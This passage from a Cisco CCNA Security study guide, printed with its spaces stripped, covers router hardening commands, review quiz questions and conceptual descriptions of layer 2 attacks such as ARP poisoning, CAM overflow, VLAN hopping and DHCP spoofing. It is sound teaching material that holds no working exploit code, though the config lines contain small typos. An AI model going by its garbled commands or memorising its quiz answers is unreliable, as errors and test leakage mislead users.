Onceaparserviewiscreated,youcanpermitaccesstotheviewwithapassword.Thismakesitsimpletoonboardanewtechnicianbyassigninghimtherolehewillplayinthenetwork.Everytechniciangrantedtherolewillhavethesamesetofoperationsavailable.
Fromahighlevel,herearethestepsrequired:
1. Createandnametheparserview.
2. Assignapasswordtotheparserview.
3. Assigncommandstotheparserview.
4. Providetheparserviewnameandpasswordtotechniciansintherole.
FirstIwillcreateaviewcalledOSPFAdmin.
R63(config)#parserviewOSPFAdmin
R63(config-view)#
Noticetheprompthaschanged,andnowanycommandsIrunwillaffectonlythisview.AtthispromptIcanbothsetapasswordandassigncommandstotheview.FirstI’llassignapassword.
R63(config-view)#secretOSPFp@$$
R63(config-view)#
NowIwillassigncommands.Iwon’tassignallcommandsrequiredtomanageOSPF,justenoughtoshowyouhowit’sdone.Youmustensurethatyouhaveprovidedallcommandsrequiredfortherole.
R63(config-view)#commandsexecincludeallshow
R63(config-view)#commandsexecincludealldebugipospf
R63(config-view)#commandsexecincludeallnodebug
R63(config-view)#commandsexecincludeallundebug
R63(config-view)#commandsconfigureincluderouterospf
Ihaveallowedaccessinexecmodetoallshowcommandsandtothedebugipospfcommandsrequired.ThenIallowedaccesstotherouterospfcommand,whichwillincludeallcommandwithinthatcontext.Afteratechnicianhasbeenassignedthisrole,hewillaccesstheroleusingthefollowingcommands.Noticethatyoucanverifytheapplicationoftherolebyusingtheshowparserviewcommand.
R63#enableviewOSPFAdmin
Password:OSPFp@$$
R63#showparserview
R63#currentviewis‘OSPFAdmin’
ImplementingCiscoIOSResilientConfigurationWhilesecuringaccesstotheroutershouldbeenoughtoeffectivelyprotecttheconfigurationoftherouter,thereisanadditionalwaytopreventunwantedchangestotheconfiguration.TheIOSresilientconfigurationfeaturecanprovideawaytoeasilyrecoverfromanattackontheconfiguration,anditcanalsohelptorecoverfromanevenworseattackinwhichtheattackerdeletesnotonlythestartupconfigurationbutalsothebootimage.
Theconfigurationofthisfeaturecanbedonewithtwocommands.Oneenablesprotectionofthebootimage,andtheotherenablesprotectionofthestartupconfiguration.Toenableprotectionofthebootimage,issuethefollowingcommand:
R64(config)#secureboot-image
*April214:24:50.231:%IOS_Resilience-5-IMAGE_RESIL_ACTIVE:Successfully
securedrunningimage
Noticethesystemmessageindicatingthebootimageisprotected.Toenableprotectionofthestartupconfiguration,issuethefollowingcommand:
R64(config)#secureboot-config
*April214:24:50.231:%IOS_Resilience-5-CONFIG_RESIL_ACTIVE:Successfully
securedconfigarchive[flash:.runcfg-20140131-14259.ar]
Oncethesetwoitemsaresecured(calledthesecurebootset),youcannotupdatethestartupconfigurationwithoutremovingthesecureconfigurationlongenoughtomakethechangeandthenresecuringitaswasdoneinthefirstplace.Toremovethesecurestartupconfiguration,executethefollowingcommand:
R64(config)#nosecureboot-config
*April214:34:50.231:%IOS_Resilience-5-CONFIG_RESIL_INACTIVE:Disabled
secureconfigarchive[removedflash:.runcfg-20140131-14259.ar]
Whenfinishedmakingchanges,executethesecureboot-configcommandtosecuretheconfigurationagain.
Butwhatdoyoudoiftheworsthappensandthestartupconfigurationisdeleted?Itcanberestored,butyoumustknowthelocationofthesecurebootconfiguration,andyoumustreferenceitinthecommand.Toidentifyitsnameandlocation,executethefollowingcommand:
R64#showsecurebootset
IOSresiliencerouteridFTX1125A67x
IOSimageresilienceversion12.4activatedat14:24:50UTCMonApril2
2017
Securearchiveflash:/c2800nm-advipservicesk9-mz.124-25e.bintypeisimage
(elf)[]Runnableimage,entrypoint0x8000F000,runfromram
IOSimageresilienceversion12.4activatedat14:24:50UTCMonApril2
2017
Securearchiveflash:.runcfg-20140131-14259.artypeisconfig
Configurationarchivesize4060bytes
Withthelocationofthesecureconfigurationsinhand,nowrunthefollowingcommandtorestoretheconfiguration:
R64(config)#secureboot-configrestoreflash:.runcfg-20140131-14259.ar
iosresilience:configurationsuccessfullyrestoredasflash:.runcfg-
20140131-14259.ar
Incaseyouwerealreadywonderingwhatwouldstopahackerfromusingthesecommands,itisworthknowingthatthesecommandscanberunonlyfromtheconsoleconnection.
ImplementingOSPFRoutingUpdateAuthenticationOneofthewaysinwhichamaliciousindividualmayattempttogatherinformationaboutyournetworkistoenabletheroutingprotocolinuseonaworkstationandconvinceyourrouterstoallowtheworkstationtobecomearoutingneighbor,allowingthemaliciousindividualtoreceiveroutingupdatesfromyourrouters.Asifthisisn’tenoughtobeconcernedabout,hemayalsoconvinceyourrouterstoacceptamaliciousroutingupdatefromhisworkstation,whichcouldpollutetheroutingtablesofyourrouters.Ifthisoccurs,itcouldresultinaninabilityoftherouterstoproperlyroute,whichwouldbeaformofdenial-of-serviceattack.Moreover,hecouldinjectroutesthatcausetraffictobedirectedtohimasapreludetoaman-in-the-middleattack.
Topreventthis,youcanconfiguretherouterstoauthenticateoneanotherwhenperformingroutingupdates.Inthefollowingtwosections,you’lllearnhowtodothisforthetwomostcommonlyusedinteriorroutingprotocols,OSPFandEIGRP.
ImplementingOSPFRoutingUpdateAuthenticationOSPFroutingupdatesaresecuredusingahashingalgorithm.YoucanuseeitherMD5orSHA-256HMAC.Beaware,however,thatsomedevicesmaysupportonlyMD5.Thefollowingarethehigh-levelstepstoconfiguringthis:
1. Defineakeychain(akeychaincanbeusedtoholdmultiplekeysifrequired).
2. Defineakeybynumberthatwillresideonthekeychain.
3. Specifythekeycharactersofthekey.
4. Specifythehashingalgorithm.
5. Applythekeychaintoaninterface.
Whilekeychainnamesandthekeynumbersdonothavetomatchonthetwo
routersoneitherendofthelink,thekeystringsandthehashingalgorithmsmustmatch!
Inthisfollowingexample,I’mgoingtouseMD5fortheconfiguration.Iwillfirstconfigure
routerR64andthenrouterR65ontheotherendofthelink.Thefirststepistoconfigurethekeychainasshownhere.ThekeychainonR64willbeospf-keys.
R64(config)#key-chainospf-keys
R64(config-keychain)#
Noticetheprompthaschanged,andIamnowinkeychainconfigurationmode,whichiswhereIwilldefinethekeynumberasfollows.ThenumberIamusingis1.
R64(config-keychain)#key1
R64(config-keychain-key)#
Again,theprompthaschanged,andIaminkey1configurationmode,whichiswhereIdefinethecharactersinthekey,calledthekeystring.ThestringIamusingistroymac.
R64(config-keychain-key)#key-stringtroymac
R64(config-keychain-key)#
Thenextstepistotelltherouterthealgorithm(MD5)touseforthiskey,whichisdoneatthesamekey1prompt.
R64(config-keychain-key)#cryptographic-algorithmmd5
R64(config-keychain-key)#
ThefinalstepistoapplythekeychaintotheinterfacethatconnectstorouterR65.
R64(config-if)#ipospfauthenticationkey-chainospf-keys
R64(config-if)#
Keepinmindthatwhileoneoftheroutersissettouseauthenticationandthe
otherhasnotyetbeenconfigured,routingupdateswillfail,andthedeviceswillnolongerbeOSPFneighbors.Thiswillresolveitselfassoonastheotherrouteriscorrectlyconfigured.
TheconfigurationcanbethesameonrouterR65,butI’mgoingtochangetwoofthevaluesthatdonothavetomatchjusttoshowthattheydon’thavetomatch,whilekeepingthevaluesthatdohavetomatch(thekeystringandthehashingalgorithm)thesame.ThefollowingistheentiresetofcommandsonR65:
R65(config)#key-chainrouter-keys
R65(config-keychain)#key2
R65(config-keychain-key)#key-stringtroymac
R65(config-keychain-key)#cryptographic-algorithmmd5
R65(config-keychain-key)#end
R65(config)#intg0/1
R65(config-if)#ipospfauthenticationkey-chainrouter-keys
ImplementingEIGRPRoutingUpdateAuthenticationConfiguringEIGRProutingupdateauthenticationissimilartoOSPF.However,OSPFspecifiesthehashingalgorithmsinthesamemodewhereyouspecifythekeystring,butinEIGRPyouspecifythatontheinterface.ThefollowingarethecommandsforR64andR65.Additionally,whenyouspecifythealgorithm,youspecifytheEIGRPASnumberinthesamecommand.Inthefollowingexamples,thatASnumberis66.Noticethat,again,thekeychainnamesandkeynumbersdonothavetomatch,whilethekeystringandhashingalgorithmsdohavetomatch.
R64(config)#key-chainrouter-keys
R64(config-keychain)#key1
R64(config-keychain-key)#key-stringtroymac
R64(config-keychain-key)#end
R64(config)#intg0/2
R64(config-if)#ipauthenticationkey-chainrouter-keys
R64(config-if)#upauthenticationmodeeigrp66md5
R65(config)#key-chainEIGRP-keys
R65(config-keychain)#key2
R65(config-keychain-key)#key-stringtroymac
R65(config-keychain-key)#end
R65(config)#intg0/1
R65(config-if)#ipauthenticationkey-chainEIGRP-keys
R65(config-if)#ipauthenticationmodeeigrp66md5
SecuringtheControlPlaneTherearefourtypesofpacketsthataroutermayencounter,andtheyoperateinfour“planes”oftherouter.Thefourplanesandthetypesofpacketsthatoperateintheseplanesareasfollows:
DataPlanePacketsTheseareend-station,user-generatedpacketsthatarealwaysforwardedbynetworkdevicestootherend-stationdevices.
ControlPlanePacketsThesearenetworkdevice–generatedorreceivedpacketsthatareusedforthecreationandoperationofthenetworkitself.ExamplesincludeprotocolssuchasARP,BGP,andOSPF.
ManagementPlanePacketsThesearenetworkdevice–generatedorreceivedpacketsormanagementstation–generatedorreceivedpacketsthatareusedtomanagethenetwork.ExamplesareTelnet,SSH,TFTP,SNMP,FTP,NTP,HTTP,HTTPSandotherprotocolsusedtomanagethedeviceand/ornetwork.
ServicesPlanePacketsAsubsetofdataplanepackets,servicesplanepacketsarealsouser-generatedpacketsthatareforwardedbynetworkdevicestootherend-stationdevices.ExamplesincludesuchfunctionsasGREencapsulation,QoS,MPLSVPNs,andSSL/IPsecencryption/decryption.
Theconcerninthissectioniswiththeprotectionofaccesstothecontrolplane,whichincludes
thehardwareandsoftwarethatsupportsroutingandthemanagementofthedevice.Packetsinthecontrolplanearethosethatareeitherdestinedfortherouteritselforgeneratedbytherouter.Ifaccesstothecontrolplaneisnotprotected,routingtablecorruption,changestotherouterconfiguration,andDoSattacksontheroutermayresult.
ControlPlanePolicingControlplanepolicing(CoPP)isaCiscoIOSfeaturethatcanbeimplementedtopreventtheseissues.Itsimplementationisanadvancedtopicnotcoveredintheexamobjectives;however,anunderstandingofitsuseisincludedintheexamobjectives.
CoPPtreatsthecontrolplaneasastand-aloneentitywithitsowningressandegressports.Itallowsfortheimplementationofcontrolsattheingressporttothecontrolplane.Figure4.1showstherelationshipbetweenthosecontrolplaneingressandegressportsandthephysicalinterfaces.Italsoshowsthepathstakenbythefourtypesoftrafficdiscussedintheprevioussection.
FIGURE4.1CoPP
NoticethatthreetypesoftrafficcanbecontrolledbyCoPP,thatis,management,control,andservicestraffic.Alsonoticethatwhenaccesscontrollists(ACLs)areappliedtotheingressphysicalinterfaceandCoPPhasalsobeenapplied,CoPPcomesintoplayonlyfortrafficthatwasallowedthroughtheingressphysicalinterfaceACL.Asyoucansee,ultimatelyCoPPisdesignedtoprotecttherouteprocessor.Controlscanbeimplementedthatallowanddisallowcertaintypesoftrafficandcanalsobeusedtorate-limitthetrafficsoastopreventaDoSattack.
WhenCoPPisconfigured,theconfigurationfollowstheCiscoModularQoSCLI(MQC).Inthismodel,threemechanismsareused.
ClassMapsUsedtocategorizetraffictypesintoclasses.ACLsaretypicallyusedtodefinethetraffic,andthentheACLisreferencedintheclassmap.
PolicyMapsUsedtodefinetheactiontobetakenforaparticularclass.Actionsthatcanbe
specifiedareallow,block,andrate-limit.
ServicePoliciesUsedtospecifywherethepolicymapshouldbeimplemented.
Figure4.2showstherelationshipbetweenthesemechanisms.
FIGURE4.2Modularpolicyframework
Thisframeworkisusedforotherfeaturesaswell,suchasQoSandtrafficshaping.
SummaryInthischapter,youlearnedaboutmethodsforsecuringadministrativeaccesstotherouterorswitch.YoualsolearnedhowIOSprivilegelevelsandIOSrole-basedCLIcanbeusedtospecifyallowedactions.TheCiscoIOSresilientconfigurationfeatureanditsbenefitswereintroduced.YoualsolearnedhowtoconfigureauthenticationforrouterupdatesforbothOSPFandEIGRP.Finally,thechapterdiscussedhowcontrolplanepolicingcanbeusedtocontrolaccesstothecontrolplane.
ExamEssentials
Secureadministrativeaccesstotherouter.CompletethestepsrequiredtouseSecureShelltoadministertherouter.ThesestepsincludesettingtherouternameanddomainnameandgeneratingtheRSAkey.ItalsoincludesspecifyingtheuseofSSHonthevtylines.
Controladministrativeactions.ConfigureIOSprivilegelevelsandIOSrole-basedCLItospecifyactionsallowedbytechnicianswhenmaintainingtherouter.
ImplementCiscoIOSresilientconfiguration.ProtecttheintegrityandavailabilityofboththeIOSandthestartupconfigurationbyconfiguringtheCiscoIOSresilientconfigurationfeature.
ImplementOSPFroutingupdateauthentication.DescribethestepsinvolvedinconfiguringauthenticationbetweentwoOSPFroutersthatisinvokedateachroutingupdate.
ImplementEIGRProutingupdateauthentication.DescribethestepsinvolvedinconfiguringauthenticationbetweentwoEIGRProutersthatisinvokedateachroutingupdate.
Describethebenefitsofsecuringthecontrolplane.Understandthedangersthatconfrontthecontrolplaneofarouterandhowcontrolplanepolicingcanbeusedtocontrolaccesstothecontrolplaneandpreventattacksonit.
ReviewQuestions1. WhichofthefollowingisnotarequiredstepwhenconfiguringarouterforSSHaccess?
A. Settheroutername.
B. GeneratetheRSAkey.
C. Settherouterdomainname.
D. SettherouterloopbackIPaddress.
2. Whichofthefollowingstatementsistrueofthefollowingsystemmessage?
R63(config)#
*Mar2818:32:09.095:%SSH-5-ENABLED:SSH1.99hasbeenenabled
A. ThisrouterwillacceptconnectionsonlyfromSSHversion1devices.
B. ThisrouterwillacceptconnectionsonlyfromSSHversion2devices.
C. ThisrouterwillacceptconnectionsfromSSHversion1orSSHversion2devices.
D. ThisrouterisanSSHversion1device.
3. Whichstatementisfalsewithregardtothisconfiguration?
R63(config)#linevty01114
R63(config-line)#loginlocal
R63(config-line)#transportinputssh
R63(config-line)#
A. vtyline67isaffectedbythisconfiguration.
B. Theuseraccountsforaccesstothevtylinesarecontainedonthisrouter.
C. OnlySSHisallowedtobeusedonthevtylines.
D. SSHaccesswillbecontrolledbyaTACACS+server.
4. WhichofthefollowingstatementsistruewithregardtoprivilegelevelsintheIOS?
A. Thereare16privilegelevels.
B. Level16isusermode.
C. Level0isprivilegedmode.
D. PrivilegelevelscanbedefinedonroutersbutnotASAdevices.
5. WhichofthefollowingcommandsallowsthetechniciantowhomtheprivilegelevelwillbeassignedtoonlychangeIPaddresses?
A. privilegeexeclevel12showinterfaces
B. privilegeconfigurelevel12interface
C. privilegeinterfacelevel12ip
D. enablesecretlevel12wordpass
6. Whichofthefollowingistheonlyparserviewthatexistsbydefault?
A. admin
B. root
C. exec
D. priv
7. Whichofthestatementsistruewithregardtothefollowingconfiguration?
R64(config)#secureboot-image
*April217:24:50.231:%IOS_Reslience-5-IMAGE_RESIL_ACTIVE:Successfully
securedrunningimage
A. Itsecuresthestartupconfiguration.
B. ItsecurestheIOSimage.
C. ItsecuresboththeIOSimageandthestartupconfiguration.
D. Itsecuresnothinguntilanadditionalcommandisrun.
8. WhichofthefollowingstatementsisfalsewithregardtotheCiscoIOSresilientconfiguration?
A. TheIOSimageandthestartupconfigurationarecalledthesecurebootsetwhenprotected.
B. Oncesecured,theconfigurationcannotberemoved.
C. Torestorethebootset,youmustknowitslocation.
D. Torestorethebootset,youmustknowitsname.
9. Whichofthefollowingcanbedoneonlyfromaconsoleconnection?
A. SetupSSH.
B. Removeasecurebootsetconfiguration.
C. Createaprivilegelevel.
D. GenerateanSSHkey.
10. WhichofthefollowinghashingalgorithmsareusedtoimplementOSPFroutingupdateauthentication?
A. MD4
B. MD5
C. SHA1
D. SHA2
11. WhichofthefollowingconfigurationsettingsmustmatchinthetworouterswhenconfiguringOSPFroutingupdateauthentication?
A. Keychainname
B. Keynumber
C. Keystring
D. Routerpasswords
12. TowhichcomponentisthekeychainappliedwhenconfiguringOSPFroutingupdateauthentication?
A. Routingprotocol
B. Hashingalgorithm
C. Interface
D. Key
13. TowhichcomponentisthekeyappliedwhenconfiguringOSPFroutingupdateauthentication?
A. Routingprotocol
B. Hashingalgorithm
C. Interface
D. Keychain
14. TowhichcomponentisthehashingalgorithmappliedwhenconfiguringOSPFroutingupdateauthentication?
A. Key
B. Hashingalgorithm
C. Interface
D. Keychain
15. HowisconfiguringEIGRProutingupdateauthenticationdifferentfromOSPF?
A. OSPFspecifiesthehashingalgorithmsinthesamemodewhereyouspecifythekeystring;inEIGRP,thatisspecifiedontheinterface.
B. EIGRPspecifiesthehashingalgorithmsinthesamemodewhereyouspecifythekeystring;inOSPF,thatisspecifiedontheinterface.
C. OSPFspecifiesthekeychaininthesamemodewhereyouspecifythekeystring:inEIGRP,thatisspecifiedontheinterface.
D. OSPFspecifiesthekeychaininthesamemodewhereyouspecifythekeystring;inEIGRP,thatisspecifiedonthehashingalgorithm.
16. WhenyouspecifythealgorithmforEIGRProuteupdateauthentication,youalsospecifywhatvalueinthesamecommand?
A. ProcessID
B. ASnumber
C. AreaID
D. Interfacenumber
17. Whichpackettypecomesfromendstationstobeforwardedbytherouter?
A. Dataplane
B. Controlplane
C. Managementplanepackets
D. Servicesplanepackets
18. Whichofthefollowingisanexampleofcontrolplanepackets?
A. Datatoberouted
B. OSPFupdates
C. Telnetpackets
D. Packetsforwardedbynetworkdevicestootherend-stationdevices
19. Packetsthatareeitherdestinedfortherouteritselforgeneratedbytherouterareinwhich
plane?
A. Dataplane
B. Servicesplane
C. Controlplane
D. Servicesplane
20. WhenCoPPisconfigured,theconfigurationfollowstheCiscoModularQoSCLI(MQC).Inthismodel,whichmechanismspecifiestheactionstobetakenonthespecifiedtraffictype?
A. Classmap
B. Policymap
C. Servicepolicy
D. Actionmap
Chapter5UnderstandingLayer2AttacksCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
4.4CommonLayer2attacks
DescribeSTPattacks
DescribeARPspoofing
DescribeMACspoofing
DescribeCAMtable(MACaddresstable)overflows
DescribeCDP/LLDPreconnaissance
DescribeVLANhopping
DescribeDHCPspoofing
Topreventacertaintypeofattack,youmustunderstandtheattack.AttackscanoccuratanumberofdifferentlayersoftheTCP/IPmodel.WhenIdiscusslayer2attacks,Iamtalkingaboutattacksthatuselayer2addresses(MACaddresses)orthatareaimedatprotocolsthatoperateatlayer2.Finally,somelayer2attackstakeadvantageoflayer3servicessuchasDHCP,buttheydosowithinalocalsubnetandthusarealsocalledlayer2attacks.Inthischapter,I’lldescribehowanumberoflayer2attacksoccur.Inthenextchapter,I’lldiscussmitigationsfortheseattacks.
Inthischapter,youwilllearnthefollowing:
Commonlayer2attacks
UnderstandingSTPAttacksSpanningTreeProtocol(STP)isusedtopreventswitchingloopsthatcanoccurwhenthereisredundancybuiltintotheswitchingnetwork.Sinceredundancyisadesirabledesignconcept,STPisafeaturethatyoucannotlivewithout.Unfortunately,thereisanattackontheswitchingnetworkthattakesadvantageoftheoperationsofSTP.ThegoodnewsisthatCiscohasdevelopedseveralresponsestotheseattacks,butyoumustunderstandtheattacksandhowthefeaturesaddressthevulnerabilitiestoproperlyimplementthesesafeguards.Inthischapter,I’ll
discusstheattacksandhowtheywork,andinChapter6I’llcovertheimplementationofthemitigations.
STPattackstargettheloop-freeswitchingtopologythatiscreatedbytheswitchesusingthebridgeprotocoldataunits(BPDUs)uponwhichSTPisbased.TheseBPDUsareusedbytheswitchestoselecttherootbridgeandthereaftertoselecttheswitchportsthatareforwardingandthosethatareblocking.TheseBPDUsarealsousedwhenachangeinthetopologyoccurs(suchasalinkgoingdown)toestablishanewloop-freetopologybasedupontheremaininglinks.
Whilelinkissuescancauseachangeinthetopology,anothereventcancausethisaswell,andthatistheintroductionofanewswitchinthenetworkthatpossessesahigherbridgepriority(sometimescalledasuperiorBPDU)thanthecurrentrootbridge.WhenamaliciousindividualintroducesarogueswitchtotheswitchingnetworkandtherogueswitchhasasuperiorBPDUthantheoneheldbythecurrentrootbridge,thenewswitchassumesthepositionofrootbridge.
Sincethetopologyoftheswitchingnetworkdependsonthepositionoftherootbridgeandtherelativepositionoftheotherswitchestotherootbridge,thisaltersthetopologyinwaysthatnotonlymayimpactperformancebutmaycausealltraffictotraversethenewrogueswitch,whichwillbeunderthemanagementoftheattacker.Toseehowthiscanimpactthetopology,lookatFigure5.1.
FIGURE5.1STPattack
Again,mitigationstothisattackwillbecoveredinChapter6.
UnderstandingARPAttacks
AnARPpoisoningattackisonethattakesadvantageofthenormalprocessthatdevicesusetolearnanunknownMACaddressthatadevicewithaknownIPaddresspossesses.BeforeIcovertheARPpoisoningattack,I’llreviewtheARPbroadcastprocess.
AddressResolutionProtocol(ARP),oneoftheprotocolsintheTCP/IPsuite,operatesatlayer3oftheOSImodel.Theinformationitderivesisutilizedatlayer2,however.ARP’sjobistoresolvethedestinationIPaddressplacedintheheaderbyIPtoalayer2orMACaddress.Remember,whenframesaretransmittedonalocalsegment,thetransferisdoneintermsofMACaddresses,notIPaddresses,sothisinformationmustbeknown.
Wheneverapacketissentacrossthenetwork,ateveryrouterhopandagainatthedestinationsubnetthesourceanddestinationMACaddresspairschange,butthesourceanddestinationIPaddressesdonot.TheprocessthatARPusestoperformthisresolutioniscalledanARPbroadcast.
FirstanareaofmemorycalledtheARPcacheisconsulted.IftheMACaddresshasbeenrecentlyresolved,themappingwillbeinthecache,andabroadcastisnotrequired.Iftherecordhasagedoutofthecache,ARPsendsabroadcastframetothelocalnetworkthatalldeviceswillreceive.ThedevicethatpossessestheIPaddressrespondswithitsMACaddress.ThenARPplacestheMACaddressintheframeandsendstheframe.Figure5.2illustratesthisprocess.
FIGURE5.2ARPprocess
InanARPpoisoningattack,theattackersendsapackettypecalledagratuitousARPtothetargetdevicewithanincorrectIPaddresstoMACaddressmapping.
What’saGratuitousARP?
AgratuitousARPiscalledgratuitousbecausetheARPmessagesentisananswertoaquestionthatthetargetneverasks.InthenormalARPprocess,adeviceneverannouncesitsMACaddresstoanotherdeviceunlessaskedtodoso.ThismeansthereisanARPrequestthatgoesfromdeviceAtodeviceBandthenanARPreplyfromdeviceBtodeviceA.InthecaseofthegratuitousARP,theARPmessageisareplytoarequestneversentbythetargetthatcausesamalicious(andincorrect)updatetothereceiver’sARPcache.
Inaclassicman-in-themiddleattack,theattackerwillsendthesegratuitousARPrequeststothetwotargetdevicesbetweenwhichhewouldliketobe“inthemiddle.”InthescenariosshowninFigure5.3,thetwotargetsaretheVictimlaptopandthedefaultgatewayoftheVictimlaptop.
FIGURE5.3ARPcachepoisoning
AfterthegratuitousARPmessagesaresentandprocessedbythetwotargets,theVictimlaptopandtherouterinterfacewouldbesendingtraffictotheattackerwhileboththinkingtheyaresendingtooneanother.MitigationsforthisattackwillbepresentedinChapter6.Stayedtuned!
UnderstandingMACAttacksMACspoofingattacksoccurwhenanattackerchangeshisMACaddresssothathisdeviceappearstobeanotherdevice.Asisthecasewithallspoofingattacks,theultimateaimistoreceivesomethingintendedfortherealdeviceortogetpastaccesscontrolsbasedonaMACaddress.
AMACaddressattackisalsoconsideredaswitchattackbecauseitleveragestheMAC
addresstableintheswitchtoaccomplishthegoalofreceivingtrafficdestinedforanotherdevice.Asyouknow,theMACaddresstableispopulatedasframesaresentandreceivedbytheswitch.OntheleftsideofFigure5.4,theMACtablepriortotheattackisshown.
FIGURE5.4MACspoofing
Priortotheattack,theswitchhastheMACaddressA(shortenedforsimplicity)recordedonportFa0/1wheretherealholderofthatMACaddressresides.WhentheattackersendsaframewithaspoofedMACaddressofA,thentheswitchdoeswhataswitchissupposedtodo.ItremovestheMACaddressfromitscurrentlistingofportFa0/1andmovesittoportFa0/4,wheretheattackerresides.NowtheattackerwillreceivealltrafficdestinedforthedeviceonportFa0/1.ThiswillcontinueuntilthedeviceonportFa0/1sendsaframe.However,bycontinuallysendingframes,theattackerwillbeabletocontinuallyupdatethetabletohisadvantage.Butfearnot!Therearewaystodealwiththis,andIwillcovertheminChapter6.You’llgettheresoon.Don’tpeek!
UnderstandingCAMOverflowsAsyouknow,theMACaddresstable,alsocalledthecontentaddressablememory(CAM)table,ispopulatedbytheswitchasframesareswitchedthroughit.TheswitchrecordsthesourceMACaddressofeveryframeenteringeachport.Thereisalimitedamountofmemoryspacethatisavailableforthistable.InaCAMoverflowattack,theattackerfloodstheswitchwithframesthathaveinvalidsourceMACaddresses.Thisiseasierthanitsoundsbyusingatoolsuchasmacof.
Atsomepoint,theCAMtableisfullandcanholdnootherMACaddresses.AnyMACaddressesthatwereinthetablepriortotheattackwillstillbethere,andthosedeviceswillstillbeabletoreceivetraffic.However,itisnottheaimoftheattackertopreventaccesstothesedevices.WhenthetableisfullandframesdestinedtoMACaddressesthatarenotcurrentlyinthetablearereceived,theywillbefloodedoutallports.Ifyouthinkaboutit,thisisthenormaloperationofaswitchwhenitreceivesaframewithanunknowndestination
MACaddress.Figure5.5showsthisattack,withthestepsintheprocessnumbered.
FIGURE5.5CAMoverflow
Theresultofthisattackisthattheattackerisnowabletoreceivetrafficthathewouldnothavebeenabletoseeotherwisebecauseinthisconditiontheswitchisbasicallyoperatingasahub,notaswitch.InChapter6I’lldiscusshowtopreventthisattack.
UnderstandingCDP/LLDPReconnaissanceCiscoDiscoveryProtocol(CDP)anditsstandards-basedalternativeLinkLayerDiscoveryProtocol(LLDP)areusefultools.Theycanbeusedtodisplayinformationaboutdirectlyconnecteddevices.Thiscanbeespeciallyusefulwhenyouhavenolayer3connectivitytoaneighboringdevicebecausetheprotocolsoperateatlayer2andthuscanbeusedtoextractinformationevenwhenIPisnotfunctional.Unfortunately,asisoftenthecase,thereisadarksidetothesetools.
Whenamaliciousindividualisattemptingtohackyournetwork,thefirstthingthehackerdoesisperformnetworkreconnaissance.Thisoperationadmitstogatheringallinformationpossibleaboutthelayoutofthenetworkandthedevicesinthenetwork.BycapturingtheCDPorLLDPpacketsthatareusedbyCiscodevicestoexchangeinformation,awealthofinformationcanbeobtained.
Forthisreason,manyorganizationschoosetoforgotheadvantagesofusingCDPandLLDPanddisabletheoperationofbothonCiscodevices.Disablingthesefeaturescanbedoneonaninterfacebasisorgloballyonallinterfaces.ThistimeIwon’tmakeyouwaituntilChapter6forthesolution.
TodisableCDPonaninterface,usethefollowingcommandininterfaceconfigurationmode:
Router67(config-if)#nocdpenable
TodisableCDPglobally,runthefollowingcommandinglobalconfigurationmode:
Router67(config)#nocdprun
TodisableLLDPonaninterface,runthefollowingcommandsininterfaceconfigurationmode:
Router67(config-if)#nolldpreceive
Router67(config-if)#nolldptransmit
TodisableLLDPglobally,runthefollowingcommandinglobalconfigurationmode:
Router67(config)#nolldprun
UnderstandingVLANHoppingAvirtualLAN(VLAN)securityissueyoushouldbeawareofiscalledVLANhopping.Bydefault,aswitchportisanaccessport,whichmeansitcanbeamemberofonlyasingleVLAN.PortsthatareconfiguredtocarrythetrafficofmultipleVLANs,calledtrunkports,areusedtocarrytrafficbetweenswitchesandrouters.AVLANhoppingattack’saimistoreceivetrafficfromaVLANofwhichthehacker’sportisnotamember.Thiscanbedoneintwoways,coverednext.
SwitchSpoofingSwitchportscanbesettouseaprotocolcalledDynamicTrunkingProtocol(DTP)tonegotiatetheformationofatrunklink.IfanaccessportisleftconfiguredtouseDTP,itispossibleforhackerstosettheirinterfacetospoofaswitchanduseDTPtocreateatrunklink.Ifthisoccurs,theycancapturetrafficfromallVLANs.Figure5.6showsaswitchspoofingattack.
FIGURE5.6Switchspoofing
ThepreventionofthisattackwillbecoveredinChapter6.
DoubleTaggingTrunkportsuseanencapsulationprotocolcalled802.1qtoplaceaVLANtagaroundeachframetoidentifytheVLANtowhichtheframebelongs.Whenaswitchattheendofatrunklinkreceivesan802.1qframe,itstripsthisoffandforwardsthetraffictothedestinationdevice.Inadoubletaggingattack,thehackercreatesaspecialframethathastwotags.The
innertagistheVLANtowhichthehackerwantstosendaframe(perhapswithmaliciouscontent),andtheoutertagistherealVLANofwhichthehackerisamember.Iftheframegoesthroughtwoswitches(whichispossiblesinceVLANscanspanswitches),thefirsttaggetstakenoffbythefirstswitch,leavingthesecond,whichallowstheframetobeforwardedtothetargetVLANbythesecondswitch.
Figure5.7showsthisprocess.Inthisexample,thenativeVLANnumberbetweentheCompanySwitchAandCompanySwitchBswitcheshasbeenchangedfromthedefaultof1to10.
FIGURE5.7Doubletagging
Doubletaggingisonlyanissueonswitchesthatuse“native”VLANs.AnativeVLANisusedforanytrafficthatisstillamemberofthedefaultVLAN,orVLAN1.ThemitigationofthisattackwillbecoveredinChapter6.
UnderstandingDHCPSpoofingDynamicHostConfigurationProtocol(DHCP)isusedtoautomatetheprocessofassigningIPconfigurationstohosts.Whenconfiguredproperly,itreducesadministrativeoverload,reducesthehumanerrorinherentinmanualassignment,andenhancesdevicemobility.Butitintroducesavulnerabilitythatwhenleveragedbyamaliciousindividualcanresultinaninabilityofhoststocommunicate(constitutingaDoSattack)andcanresultinpeer-to-peerattacks.
WhenanillegitimateDHCPserver(calledarogueDHCPserver)isintroducedtothenetwork,unsuspectinghostsmayacceptDHCPofferpacketsfromtheillegitimateDHCPserver,ratherthanthelegitimateDHCPserver.Whenthisoccurs,therogueDHCPserverwillnotonlyissuethehostanincorrectIPaddress,subnetmask,anddefaultgatewayaddress(whichmakesapeer-to-peerattackpossible)butcanalsoissueanincorrectDNSserveraddress,whichwillleadtothehostrelyingontheattacker’sDNSserverfortheIPaddressesofwebsites(suchasmajorbanks)thatleadtophishingattacks.Figure5.8showsanexampleofhowthiscanoccur.
FIGURE5.8DHCPspoofing
InFigure5.8,afterreceivinganincorrectIPaddress,subnetmask,defaultgateway,andDNSserveraddressfromtherogueDHCPserver,theDHCPclientusestheattacker’sDNSservertoobtaintheIPaddressofhisbank.Thisleadshimtounwittinglyconnecttotheattacker’scopyofthebank’swebsite.Whenthecliententershiscredentialstologin,theattackernowhashisbankcredentialsandcanproceedtoemptyouthisaccount.Itsoundsscary,butluckilyIwillcovermitigationforthisattackinChapter6!
